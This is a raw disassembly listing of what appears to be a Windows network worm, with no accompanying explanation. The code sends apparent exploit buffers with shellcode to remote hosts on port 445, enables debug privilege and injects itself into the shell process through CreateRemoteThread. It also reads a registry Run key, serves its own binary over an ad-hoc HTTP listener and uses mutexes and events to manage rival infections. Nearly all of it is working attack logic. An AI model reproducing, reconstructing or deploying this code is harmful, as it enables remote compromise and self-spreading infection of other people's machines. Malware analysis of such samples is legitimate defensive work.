var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31432EC0
mov eax, dword_31434CAC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31434CB0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3143115C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31431F1C
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31431160 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_314310A0 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31434CA0
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31431A2F: ; CODE XREF: sub_314319BC+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31431A2F
push 60h
lea eax, [ebp+var_E4]
push offset dword_314347C0
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31432EAC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31432EB2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31432EAC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31432EAC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31432EAC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31432EB2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31432EA6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31432EA6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31431164 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31431168 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31431F12
mov esi, dword_3143109C
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3143116C
push 89h
push offset dword_314345A8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0A8h
push offset dword_31434634
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0DEh
push offset dword_314346E0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
cmp eax, 46h
jl loc_31431F07
cmp [ebp+var_730], 31h
jnz loc_31431DB2
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31432EA6 ; memset
add esp, 0Ch
push offset byte_314342E0
call dword_31431088 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_314342E0
push eax
call sub_31432EB2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31431088 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31432EB2 ; memcpy
mov eax, dword_31434BE6
add esp, 0Ch
mov [ebp+var_798], eax
loc_31431C53: ; CODE XREF: sub_314319BC+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 68h
push offset dword_31434824
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0A0h
push offset dword_31434890
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
cmp [ebp+arg_0], 0
jz loc_31431EA2
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31434A48
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31432EB2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31434AB4
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31432EB2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31434B28
push eax
call sub_31432EB2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31431F07
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31431EFA
; ---------------------------------------------------------------------------
loc_31431DB2: ; CODE XREF: sub_314319BC+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31432EA6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31434C20
push eax
call sub_31432EB2 ; memcpy
push offset byte_314342E0
call sub_31432EAC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_314342E0
push eax
call sub_31432EB2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31434C98
push eax
call sub_31432EB2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31434C20
push eax
call sub_31432EB2 ; memcpy
add esp, 40h
push offset byte_314342E0
call sub_31432EAC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_314342E0
push eax
call sub_31432EB2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31431E4E: ; CODE XREF: sub_314319BC+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31431E4E
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31432EA6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31432EA6 ; memset
add esp, 18h
jmp loc_31431C53
; ---------------------------------------------------------------------------
loc_31431EA2: ; CODE XREF: sub_314319BC+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31434934
push eax
call sub_31432EB2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31432EB2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_314349B4
push eax
call sub_31432EB2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31431EFA: ; CODE XREF: sub_314319BC+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_31431F07: ; CODE XREF: sub_314319BC+1AD�j
; sub_314319BC+1E1�j ...
push 2
push [ebp+var_4]
call dword_31431174 ; shutdown
loc_31431F12: ; CODE XREF: sub_314319BC+166�j
push [ebp+var_4]
call dword_31431178 ; closesocket
pop esi
loc_31431F1C: ; CODE XREF: sub_314319BC+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_314319BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431F23 proc near ; CODE XREF: UPX0:loc_31432531�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314310AC ; LoadLibraryA
mov esi, dword_314310A8
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_31431FA7
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_31431FA7
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_31431FA7
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314310A4 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_31431FA7: ; CODE XREF: sub_31431F23+28�j
; sub_31431F23+37�j ...
pop edi
pop esi
leave
retn
sub_31431F23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31431FAB proc near ; CODE XREF: UPX0:31432545�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31435040
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314310B8 ; GetModuleHandleA
mov esi, dword_314310A8
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31431FF2
loc_31431FEE: ; CODE XREF: sub_31431FAB+54�j
push 1
jmp short loc_31432043
; ---------------------------------------------------------------------------
loc_31431FF2: ; CODE XREF: sub_31431FAB+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31431FEE
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31431114 ; FindWindowA
test eax, eax
jnz short loc_31432020
call dword_31431118 ; GetForegroundWindow
test eax, eax
jnz short loc_31432020
push 2
jmp short loc_31432043
; ---------------------------------------------------------------------------
loc_31432020: ; CODE XREF: sub_31431FAB+65�j
; sub_31431FAB+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_3143111C ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_314310B4 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_31432046
push 3
loc_31432043: ; CODE XREF: sub_31431FAB+45�j
; sub_31431FAB+73�j
pop eax
jmp short loc_314320B1
; ---------------------------------------------------------------------------
loc_31432046: ; CODE XREF: sub_31431FAB+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_31431080
test eax, eax
jz short loc_314320A4
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314310B0 ; WriteProcessMemory
push dword_31435034
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31432090
push eax
call esi ; CloseHandle
jmp short loc_314320AB
; ---------------------------------------------------------------------------
loc_31432090: ; CODE XREF: sub_31431FAB+DE�j
push offset aUterm192 ; "uterm19-2"
call sub_314320E4
pop ecx
mov [ebp+var_4], 5
jmp short loc_314320AB
; ---------------------------------------------------------------------------
loc_314320A4: ; CODE XREF: sub_31431FAB+B2�j
mov [ebp+var_4], 4
loc_314320AB: ; CODE XREF: sub_31431FAB+E3�j
; sub_31431FAB+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_314320B1: ; CODE XREF: sub_31431FAB+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31431FAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314320B6 proc near ; CODE XREF: sub_3143237F+B�p
; UPX0:31432507�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314310BC ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314310EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_314320B6 endp
; =============== S U B R O U T I N E =======================================
sub_314320E4 proc near ; CODE XREF: sub_31431FAB+EA�p
; UPX0:31432511�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314310C0 ; CreateMutexA
retn
sub_314320E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314320F3 proc near ; CODE XREF: sub_3143256D+163�p
; sub_3143256D+16E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314310C4 ; CreateThread
pop ebp
retn
sub_314320F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143210D proc near ; CODE XREF: sub_3143237F+12C�p
; sub_3143278A+59�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314310C4 ; CreateThread
push eax
call dword_31431080 ; CloseHandle
pop ebp
retn
sub_3143210D endp
; =============== S U B R O U T I N E =======================================
sub_3143212E proc near ; CODE XREF: sub_314311A0+68�p
; sub_31432C62+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31432156
loc_3143213F: ; CODE XREF: sub_3143212E+26�j
call dword_314310FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_3143213F
loc_31432156: ; CODE XREF: sub_3143212E+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_3143212E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143215E proc near ; CODE XREF: sub_314311A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31432EA6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314310C8 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_31431080
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_3143215E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314321B4 proc near ; CODE XREF: sub_31432810+3E�p
; sub_314328D7+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_31431150 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_314321D5
call dword_31431154 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_314321D5: ; CODE XREF: sub_314321B4+15�j
lea eax, [ebp+var_34]
push eax
call dword_31431158 ; gethostbyname
test eax, eax
jnz short loc_314321EA
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_314321EA: ; CODE XREF: sub_314321B4+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_314321B4 endp
; =============== S U B R O U T I N E =======================================
sub_314321F3 proc near ; CODE XREF: sub_3143185D+12�p
; sub_31432728+21�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31431134 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_314321F3 endp
; =============== S U B R O U T I N E =======================================
sub_31432209 proc near ; CODE XREF: sub_3143256D+F4�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314310D0 ; OpenEventA
test eax, eax
jz short locret_31432222
push eax
call dword_314310CC ; SetEvent
locret_31432222: ; CODE XREF: sub_31432209+10�j
retn
sub_31432209 endp
; =============== S U B R O U T I N E =======================================
sub_31432223 proc near ; CODE XREF: sub_3143185D+68�p
push esi
mov esi, dword_314310FC
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_31432223 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432239 proc near ; DATA XREF: sub_3143237F+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_31431170 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_3143226A
push 1
jmp loc_31432325
; ---------------------------------------------------------------------------
loc_3143226A: ; CODE XREF: sub_31432239+28�j
mov esi, dword_31431104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31432335
lea eax, [ebp+var_100]
push offset dword_314341F0
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31432335
mov esi, dword_3143116C
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_31435030
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_31431120 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31432EAC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_314322E7: ; CODE XREF: sub_31432239+E8�j
mov eax, dword_31435030
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_314322F9
mov eax, ecx
loc_314322F9: ; CODE XREF: sub_31432239+BC�j
test eax, eax
jz short loc_31432328
push 0
push eax
mov eax, dword_31435028
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31432323
cmp eax, 1000h
jb short loc_31432328
push 64h
add edi, eax
call dword_3143109C ; Sleep
jmp short loc_314322E7
; ---------------------------------------------------------------------------
loc_31432323: ; CODE XREF: sub_31432239+D5�j
push 2
loc_31432325: ; CODE XREF: sub_31432239+2C�j
pop eax
jmp short loc_31432378
; ---------------------------------------------------------------------------
loc_31432328: ; CODE XREF: sub_31432239+C2�j
; sub_31432239+DC�j
push offset dword_3143502C
call dword_314310D8 ; InterlockedIncrement
jmp short loc_31432353
; ---------------------------------------------------------------------------
loc_31432335: ; CODE XREF: sub_31432239+49�j
; sub_31432239+61�j
mov esi, dword_3143116C
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31434D64
push ebx
call esi ; send
loc_31432353: ; CODE XREF: sub_31432239+FA�j
push 7D0h
call dword_3143109C ; Sleep
push 2
push ebx
call dword_31431174 ; shutdown
push ebx
call dword_31431178 ; closesocket
push 0
call dword_314310D4 ; ExitThread
xor eax, eax
loc_31432378: ; CODE XREF: sub_31432239+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31432239 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143237F proc near ; DATA XREF: sub_3143256D+15E�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_314320B6
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_3143502C, ebx
call sub_31432A49
add esp, 14h
test eax, eax
jnz loc_314324B4
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31431084 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_314323EB
push 1
call dword_314310D4 ; ExitThread
loc_314323EB: ; CODE XREF: sub_3143237F+62�j
push ebx
push esi
call dword_314310E0 ; GetFileSize
push eax
mov dword_31435030, eax
call sub_31432E6C
pop ecx
mov dword_31435028, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31435030
push eax
push esi
call dword_314310DC ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31435030, eax
call dword_31431080 ; CloseHandle
push ebx
push 1
push 2
call dword_3143115C ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31432EA6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_3143244D: ; CODE XREF: sub_3143237F+E5�j
; sub_3143237F+ED�j ...
call dword_314310FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_3143503C, eax
jz short loc_3143244D
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_3143244D
push eax
call dword_31431164 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31431144 ; bind
test eax, eax
jnz short loc_3143244D
push 64h
push edi
call dword_31431148 ; listen
mov [ebp+var_8], esi
pop esi
loc_31432496: ; CODE XREF: sub_3143237F+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_3143114C ; accept
push eax
push offset sub_31432239
call sub_3143210D
pop ecx
pop ecx
jmp short loc_31432496
; ---------------------------------------------------------------------------
loc_314324B4: ; CODE XREF: sub_3143237F+3D�j
push ebx
call dword_314310D4 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_3143237F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314324C3 proc near ; CODE XREF: sub_3143256D:loc_314326C5�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_31431140
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_314324C3 endp
; ---------------------------------------------------------------------------
loc_314324EF: ; CODE XREF: UPX1:31437DD8�j
push 0
call dword_314310B8 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31435040, eax
call dword_31431074 ; DeleteFileA
call sub_314320B6
push offset aUterm20 ; "uterm20"
call sub_314320E4
pop ecx
mov dword_31435034, eax
call dword_31431078 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31432531
push 1
call dword_314310E4 ; ExitProcess
loc_31432531: ; CODE XREF: UPX0:31432527�j
call sub_31431F23
call sub_31432BAD
call sub_31432D2E
push offset sub_3143256D
call sub_31431FAB
test eax, eax
pop ecx
jz short loc_31432556
push 0
call sub_3143256D
loc_31432556: ; CODE XREF: UPX0:3143254D�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31432559 proc near ; CODE XREF: sub_3143256D:loc_314326EE�p
; sub_31432728:loc_31432740�p ...
push 0
push dword_31435038
call dword_31431070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31432559 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143256D proc near ; CODE XREF: UPX0:31432551�p
; DATA XREF: UPX0:31432540�o
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31431190
push offset loc_31432EA0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 6Ch
push ebx
push esi
push edi
mov [ebp+var_78], offset aU10x ; "u10x"
mov [ebp+var_74], offset aU11x ; "u11x"
mov [ebp+var_70], offset aU12x ; "u12x"
mov [ebp+var_6C], offset aU13x ; "u13x"
mov [ebp+var_68], offset aU14x ; "u14x"
mov [ebp+var_64], offset aU15x ; "u15x"
mov [ebp+var_60], offset aU16x ; "u16x"
mov [ebp+var_5C], offset aU17x ; "u17x"
mov [ebp+var_58], offset aU18x ; "u18x"
mov [ebp+var_54], offset aU19x ; "u19x"
mov [ebp+var_50], offset aU8 ; "u8"
mov [ebp+var_4C], offset aU9 ; "u9"
mov [ebp+var_48], offset aU10 ; "u10"
mov [ebp+var_44], offset aU11 ; "u11"
mov [ebp+var_40], offset aU12 ; "u12"
mov [ebp+var_3C], offset aU13 ; "u13"
mov [ebp+var_38], offset aU13i ; "u13i"
mov [ebp+var_34], offset aU14 ; "u14"
mov [ebp+var_30], offset aU15 ; "u15"
mov [ebp+var_2C], offset aU16 ; "u16"
mov [ebp+var_28], offset aU17 ; "u17"
mov [ebp+var_24], offset aU18 ; "u18"
mov [ebp+var_20], offset aU19 ; "u19"
mov [ebp+var_1C], offset aU20 ; "u20"
push offset aU20x ; "u20x"
xor edi, edi
push edi
push 1
push edi
call dword_3143106C ; CreateEventA
mov dword_31435038, eax
mov [ebp+var_4], edi
mov [ebp+var_7C], edi
loc_31432654: ; CODE XREF: sub_3143256D+FD�j
cmp [ebp+var_7C], 0Ah
jnb short loc_3143266C
mov eax, [ebp+var_7C]
push [ebp+eax*4+var_78]
call sub_31432209
pop ecx
inc [ebp+var_7C]
jmp short loc_31432654
; ---------------------------------------------------------------------------
loc_3143266C: ; CODE XREF: sub_3143256D+EB�j
mov [ebp+var_7C], edi
loc_3143266F: ; CODE XREF: sub_3143256D+118�j
cmp [ebp+var_7C], 0Eh
jnb short loc_31432687
mov eax, [ebp+var_7C]
push [ebp+eax*4+var_50]
call sub_314320E4
pop ecx
inc [ebp+var_7C]
